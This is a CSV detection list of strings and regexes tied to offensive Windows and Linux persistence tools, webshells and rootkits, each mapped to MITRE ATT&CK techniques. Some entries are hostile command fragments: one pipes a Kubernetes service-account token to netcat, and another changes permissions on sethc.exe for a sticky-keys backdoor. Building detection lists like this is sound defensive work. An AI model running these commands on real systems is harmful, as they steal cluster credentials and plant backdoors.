"*fb88b7cf0b5a1136829a3cf1c25f536713e6d7033c8b95cf31ea1e1c14c33a55*",".{0,1000}fb88b7cf0b5a1136829a3cf1c25f536713e6d7033c8b95cf31ea1e1c14c33a55.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*fb8e1c7fbb5f253cffd87b965e587b4cb611ca2e5a38a13db70a082d8b8fe49c*",".{0,1000}fb8e1c7fbb5f253cffd87b965e587b4cb611ca2e5a38a13db70a082d8b8fe49c.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*fbebaaf3a90be35d2e00d1edf45b98799357f9321ff1b94ccfd2a22e44203052*",".{0,1000}fbebaaf3a90be35d2e00d1edf45b98799357f9321ff1b94ccfd2a22e44203052.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*fcda7875e75e4d74879ad122a5861477e30c825cb90aceb76ac885cc2eb7e6dc*",".{0,1000}fcda7875e75e4d74879ad122a5861477e30c825cb90aceb76ac885cc2eb7e6dc.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","#filehash","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z"
"*fde15f9ac15ce720fff310f70bf5d36843516dbda4d98c9bfbcdec6ce44f28e8*",".{0,1000}fde15f9ac15ce720fff310f70bf5d36843516dbda4d98c9bfbcdec6ce44f28e8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*fe1ae959f9af863a11cefad541eb791a01e5bb9931cf5c57e478236ddad92ae6*",".{0,1000}fe1ae959f9af863a11cefad541eb791a01e5bb9931cf5c57e478236ddad92ae6.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*fe43248d33a0e7bd20c619186b757febef4508bea3787671d3ecc95ed742b729*",".{0,1000}fe43248d33a0e7bd20c619186b757febef4508bea3787671d3ecc95ed742b729.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*FF5F7C4C-6915-4C53-9DA3-B8BE6C5F1DB9*",".{0,1000}FF5F7C4C\-6915\-4C53\-9DA3\-B8BE6C5F1DB9.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#GUIDproject","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*ff6240c57ec7aa0a28920a304f953beec996bed301920240228e696a1810edb0*",".{0,1000}ff6240c57ec7aa0a28920a304f953beec996bed301920240228e696a1810edb0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*-file *.bin -instanceid 1337 - source persistence*",".{0,1000}\-file\s.{0,1000}\.bin\s\-instanceid\s1337\s\-\ssource\spersistence.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","N/A","10","10","370","48","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
"*Find-KeePassconfig *",".{0,1000}Find\-KeePassconfig\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*function actionBruteforce() {*",".{0,1000}function\sactionBruteforce\(\)\s\{.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","360","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*function Find-KeePassconfig*",".{0,1000}function\sFind\-KeePassconfig.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*function Local:Get-KeePassINIFields*",".{0,1000}function\sLocal\:Get\-KeePassINIFields.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*Get-ADCSTemplateACL*",".{0,1000}Get\-ADCSTemplateACL.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","179","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z"
"*Get-KeePassDatabaseKey *",".{0,1000}Get\-KeePassDatabaseKey\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*Get-RemoteCachedCredential*",".{0,1000}Get\-RemoteCachedCredential.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","375","77","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
"*Get-RemoteCachedCredential*",".{0,1000}Get\-RemoteCachedCredential.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","375","77","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
"*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","375","77","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
"*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","375","77","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
"*Get-RemoteMachineAccountHash*",".{0,1000}Get\-RemoteMachineAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","375","77","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
"*GhostPack/Seatbelt*",".{0,1000}GhostPack\/Seatbelt.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*G-Security Webshell*",".{0,1000}G\-Security\sWebshell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*h4ntu shell [powered by tsoi]*",".{0,1000}h4ntu\sshell\s\[powered\sby\stsoi\].{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*Hackcraft-Labs/ScheduleRunner*",".{0,1000}Hackcraft\-Labs\/ScheduleRunner.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*hacked_getdents64(*",".{0,1000}hacked_getdents64\(.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*hacked_kill(*",".{0,1000}hacked_kill\(.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*HackTool.MSIL.Seatbelt*",".{0,1000}HackTool\.MSIL\.Seatbelt.{0,1000}","signature_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#Avsignature","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*Hacktool.Seatbelt*",".{0,1000}Hacktool\.Seatbelt.{0,1000}","signature_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#Avsignature","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*HarmJ0y/DAMP*",".{0,1000}HarmJ0y\/DAMP.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","375","77","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
"*hasherezade/persistence_demos*",".{0,1000}hasherezade\/persistence_demos.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","1","N/A","N/A","7","3","219","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z"
"*Hello From sadsad Team*",".{0,1000}Hello\sFrom\ssadsad\sTeam.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*Hello, you have been pwned!*",".{0,1000}Hello,\syou\shave\sbeen\spwned!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","219","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z"
"*http://212.111.43.206:9090/pk.html*",".{0,1000}http\:\/\/212\.111\.43\.206\:9090\/pk\.html.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*https://github.com/m0nad/Diamorphine*",".{0,1000}https\:\/\/github\.com\/m0nad\/Diamorphine.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*I2lmbmRlZiBQSU5HT09SCiNkZWZpbmUgUElOR09PUgoKI2RlZmluZSBTRVJWRVJJUCAiM*",".{0,1000}I2lmbmRlZiBQSU5HT09SCiNkZWZpbmUgUElOR09PUgoKI2RlZmluZSBTRVJWRVJJUCAiM.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWI*",".{0,1000}I2luY2x1ZGUgPHN0ZGlvLmg\+DQojaW5jbHVkZSA8c3RyaW5nLmg\+DQojaW5jbHVkZSA8dW5pc3RkLmg\+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWI.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","360","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*icacls c:\windows\system32\sethc.exe *",".{0,1000}icacls\sc\:\\windows\\system32\\sethc\.exe\s.{0,1000}","greyware_tool_keyword","icalcs","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*icacls c:\windows\system32\sethc.exe*",".{0,1000}icacls\sc\:\\windows\\system32\\sethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*icmpBackdoor*",".{0,1000}icmpBackdoor.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*Idov31/Sandman*",".{0,1000}Idov31\/Sandman.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*Ignitetechnologies/Persistence-Accessibility-Features*",".{0,1000}Ignitetechnologies\/Persistence\-Accessibility\-Features.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","N/A","9","1","32","10","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z"
"*implant_rootkit.sh*",".{0,1000}implant_rootkit\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*ImplantSSP.csproj*",".{0,1000}ImplantSSP\.csproj.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*improsec/SharpEventPersist*",".{0,1000}improsec\/SharpEventPersist.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","370","48","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
"*INFO: Adding keepass backdoor persistence*",".{0,1000}INFO\:\sAdding\skeepass\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*INFO: Adding registry persistence*",".{0,1000}INFO\:\sAdding\sregistry\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*INFO: Adding scheduled task backdoor persistence*",".{0,1000}INFO\:\sAdding\sscheduled\stask\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*INFO: Adding scheduled task persistence*",".{0,1000}INFO\:\sAdding\sscheduled\stask\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*INFO: Adding service persistence*",".{0,1000}INFO\:\sAdding\sservice\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*INFO: Adding startup folder persistence*",".{0,1000}INFO\:\sAdding\sstartup\sfolder\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*INFO: Adding tortoise svn persistence*",".{0,1000}INFO\:\sAdding\stortoise\ssvn\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*INFO: Checking backdoor present in KeePass config file*",".{0,1000}INFO\:\sChecking\sbackdoor\spresent\sin\sKeePass\sconfig\sfile.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*INFO: Listing all scheduled tasks available to backdoor.*",".{0,1000}INFO\:\sListing\sall\sscheduled\stasks\savailable\sto\sbackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*install -y netcat; cat /run/secrets/kubernetes.io/serviceaccount/token | nc *",".{0,1000}install\s\-y\snetcat\;\scat\s\/run\/secrets\/kubernetes\.io\/serviceaccount\/token\s\|\snc\s.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*Install-PswaWebApplication -UseTestCertificate*",".{0,1000}Install\-PswaWebApplication\s\-UseTestCertificate.{0,1000}","greyware_tool_keyword","powershell","enable the PowerShell Web Access featur which could be used for remote access and potential","T1548.002 - T1059.001","TA0003","N/A","N/A","Persistence","https://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf","1","0","N/A","sigma pr https://github.com/SigmaHQ/sigma/pull/4997/files","10","10","N/A","N/A","N/A","N/A"
"*Install-PswaWebApplication*",".{0,1000}Install\-PswaWebApplication.{0,1000}","greyware_tool_keyword","powershell","enable the PowerShell Web Access featur which could be used for remote access and potential","T1548.002 - T1059.001","TA0003","N/A","N/A","Persistence","https://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf","1","0","N/A","sigma pr https://github.com/SigmaHQ/sigma/pull/4997/files","10","10","N/A","N/A","N/A","N/A"
"*Install-WindowsFeature -Name Web-Server -IncludeManagementTools*",".{0,1000}Install\-WindowsFeature\s\-Name\sWeb\-Server\s\-IncludeManagementTools.{0,1000}","greyware_tool_keyword","powershell","enable the PowerShell Web Access featur which could be used for remote access and potential","T1548.002 - T1059.001","TA0003","N/A","N/A","Persistence","https://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf","1","0","N/A","sigma pr https://github.com/SigmaHQ/sigma/pull/4997/files","10","10","N/A","N/A","N/A","N/A"
"*Install-WindowsFeature WindowsPowerShellWebAccess*",".{0,1000}Install\-WindowsFeature\sWindowsPowerShellWebAccess.{0,1000}","greyware_tool_keyword","powershell","enable the PowerShell Web Access featur which could be used for remote access and potential","T1548.002 - T1059.001","TA0003","N/A","N/A","Persistence","https://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf","1","0","N/A","sigma pr https://github.com/SigmaHQ/sigma/pull/4997/files","10","10","N/A","N/A","N/A","N/A"
"*invoke-rc.d dropbear *",".{0,1000}invoke\-rc\.d\sdropbear\s.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","N/A","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*Invoke-RIDHijacking*",".{0,1000}Invoke\-RIDHijacking.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
